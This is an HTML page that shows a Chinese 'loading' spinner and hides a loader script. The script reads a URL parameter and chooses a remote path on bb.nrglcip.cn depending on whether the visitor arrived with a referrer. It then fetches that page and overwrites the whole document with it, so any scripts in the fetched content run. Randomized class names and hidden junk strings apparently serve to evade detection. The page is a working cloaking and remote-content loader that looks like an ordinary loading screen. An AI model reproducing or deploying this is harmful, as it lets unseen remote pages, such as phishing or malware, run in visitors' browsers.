<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .wxvj74Ii {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .wxvj74Ii .dnvKmoXH {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .wxvj74Ii .content {
            line-height: 50px;
            text-align: center
        }

        .wxvj74Ii .img {
            width: 100%
        }

        .wxvj74Ii .bDESe6e3X {
            text-align: center
        }

        .wxvj74Ii .bDESe6e3X span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .wxvj74Ii .bDESe6e3X span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .wxvj74Ii .bDESe6e3X span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .wxvj74Ii .bDESe6e3X span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .wxvj74Ii .bDESe6e3X span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .wxvj74Ii .bDESe6e3X span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .wxvj74Ii .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function HyshJUeaqjeY8(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var Rt2PmPK = HyshJUeaqjeY8('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ Rt2PmPK +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ Rt2PmPK +".html?a=share";
		}
		
        w83WvJSWJ=url+"#"+new Date().getTime();
        w83WvJSWJ && function() {
            $.get(w83WvJSWJ, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<div style='display:none'>XY6iAhTcjlADUHW</div>
<a  href='#' style='display:none'>wOVMNyqaG4itgCS8T6GiD4D0JGQUqtHupRWt21tPTJiG2GesG8CKYP</a>
<p  style='display:none'>r6oJoQuXpjtFu5jOKhGnkQS1dLkzkv57aapNgm1nQHGqiKSFqaqYclaZEhhOVC</p>
<b style='display:none' >iBGdi3XJEzUTe6BUgYV</b>
<a  href='#' style='display:none'>wOVMNyqaG4itgCS8T6GiD4D0JGQUqtHupRWt21tPTJiG2GesG8CKYP</a>
<span style='display:none'>r8E0vyRUWnPsaGvgfrWBdDGqRIojGXusbmbHzGFtBaO5DXOvmsoUn3dHqSo1qSNwqyy7oRGdUZxp</span><div class="wxvj74Ii">
    <div class="dnvKmoXH">
        <div class="bDESe6e3X">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<a  href='#' style='display:none'>WXfPZW5gfAnlhQ3R9BatpaTw1kgD80ETG5k4wuv2NMQGSOF76xWKJMFDziwTH</a>
<ul style='display:none' >X1rkVQiggNKAVTSU6fh9derfo5LKzrE1nRJrNXJQxvmeUu6dc5tQlku</ul>
<img  src='' style='display:none'>
<img  src='' style='display:none'>
<img  src='' style='display:none'></body>
</html>